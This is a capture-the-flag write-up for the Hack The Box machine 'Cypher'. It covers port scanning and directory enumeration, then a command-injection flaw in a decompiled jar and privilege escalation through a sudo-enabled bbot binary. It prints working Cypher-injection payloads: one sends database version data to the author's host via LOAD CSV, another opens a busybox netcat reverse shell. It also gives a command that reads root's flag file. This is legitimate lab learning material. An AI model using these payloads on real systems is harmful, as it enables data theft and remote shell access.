HTB | Cypher

machine - https://app.hackthebox.com/machines/Cypher

IP - 10.10.11.57

NMAP

└─$ nmap -sT -p- --min-rate 10000 10.10.11.57 -Pn -oA nmap_ports
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2025-03-02 16:51 IST
Warning: 10.10.11.57 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.57
Host is up (0.21s latency).
Not shown: 58936 closed tcp ports (conn-refused), 6596 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1337/tcp open  waste

Nmap done: 1 IP address (1 host up) scanned in 53.16 seconds

└─$ cat nmap_ports.nmap | awk '/^[0-9]+\\/tcp/ {gsub("/tcp",""); print $1}' | tr '\\n' ',' | sed 's/,$/\\n/'
22,80,1337

└─$ nmap -sC -sV -p 22,80,1337 10.10.11.57 -Pn -oA nmap_ports_details
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2025-03-02 16:53 IST
Nmap scan report for 10.10.11.57
Host is up (0.21s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 be:68:db:82:8e:63:32:45:54:46:b7:08:7b:3b:52:b0 (ECDSA)
|_  256 e5:5b:34:f5:54:43:93:f8:7e:b6:69:4c:ac:d6:3d:23 (ED25519)
80/tcp   open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to <http://cypher.htb/>
|_http-server-header: nginx/1.24.0 (Ubuntu)
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 185.86 seconds

Port 80

directory enumeration

└─$ dirsearch -u <http://cypher.htb/> -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                                                            
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                     
                                                                                                                                                                                                                                            
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/anurag/htb/Cypher/reports/http_cypher.htb/__25-03-02_17-02-14.txt

Target: <http://cypher.htb/>

[17:02:14] Starting:                                                                                                                                                                                                                        
[17:02:46] 200 -    5KB - /about                                            
[17:02:46] 200 -    5KB - /about.html                                       
[17:03:07] 307 -    0B  - /api  ->  /api/docs                               
[17:03:07] 307 -    0B  - /api/  ->  <http://cypher.htb/api/api>              
[17:03:26] 307 -    0B  - /demo  ->  /login                                 
[17:03:27] 307 -    0B  - /demo/  ->  <http://cypher.htb/api/demo>            
[17:03:54] 200 -    4KB - /login                                            
[17:03:54] 200 -    4KB - /login.html                                       
[17:04:34] 301 -  178B  - /testing  ->  <http://cypher.htb/testing/>          
                                                                             
Task Completed

/login

on /testing we found a jar file

Foothold/shell

Cypher Injection

Let’s download it and decompile the jar file using an online decompiler, and analysis the code

Upon decompiling, we find a file named "CustomFunctions.java". After analyzing it, we can that there is command injection

How the Code Works

Takes a URL as input and ensures it starts with http:// or https://.

Constructs a shell command using curl to fetch the HTTP status code:

String[] command = new String[]{"/bin/sh", "-c", "curl -s -o /dev/null --connect-timeout 1 -w %{http_code} " + url};

Executes the command using Runtime.getRuntime().exec(command).
Reads the status code from the process output and returns it.

on passing admin:admin on /login I got invalid credential with the following Burp response

Found this article for exploiting the cypher injection

using the below payload to confirm the cypher injection in the username parameter

' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM '<http://10.10.14.49/?version=>' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //

Since we get error, that means the cypher injection is possible

Let’s use the below payload to get the hit on our machine

' return h.value as a UNION CALL custom.getUrlStatusCode('<http://10.10.14.49:80>') YIELD statusCode AS a RETURN a;//

We were able to get shell (for some reason it works with busybox, not normal nc)

' return h.value as a UNION CALL custom.getUrlStatusCode('<http://10.10.14.99:80>;busybox nc 10.10.14.99 1234 -e sh;#') YIELD statusCode AS a RETURN a;//

found cred for neo4j in bbot_preset.yml

The cred did not work for , Neo4j, but it worked for Graphasm

we have user.txt

Priv Esc

we have sudo write on /usr/local/bin/bbot

graphasm@cypher:~$ cat /usr/local/bin/bbot
#!/opt/pipx/venvs/bbot/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from bbot.cli import main
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\\.pyw|\\.exe)?$', '', sys.argv[0])
    sys.exit(main())

we can view the content of root.txt by

sudo /usr/local/bin/bbot -cy /root/root.txt -d

-cy load [custom yara rules](<https://www.blacklanternsecurity.com/bbot/Stable/modules/custom_yara_rules/>) 
-d is for debug

PreviousHTB | UnderPass NextHTB | Dog

Last updated 3 months ago

hashtagNMAP

hashtagPort 80

hashtagdirectory enumeration

hashtagFoothold/shell

hashtagCypher Injection

hashtagHow the Code Works

hashtagPriv Esc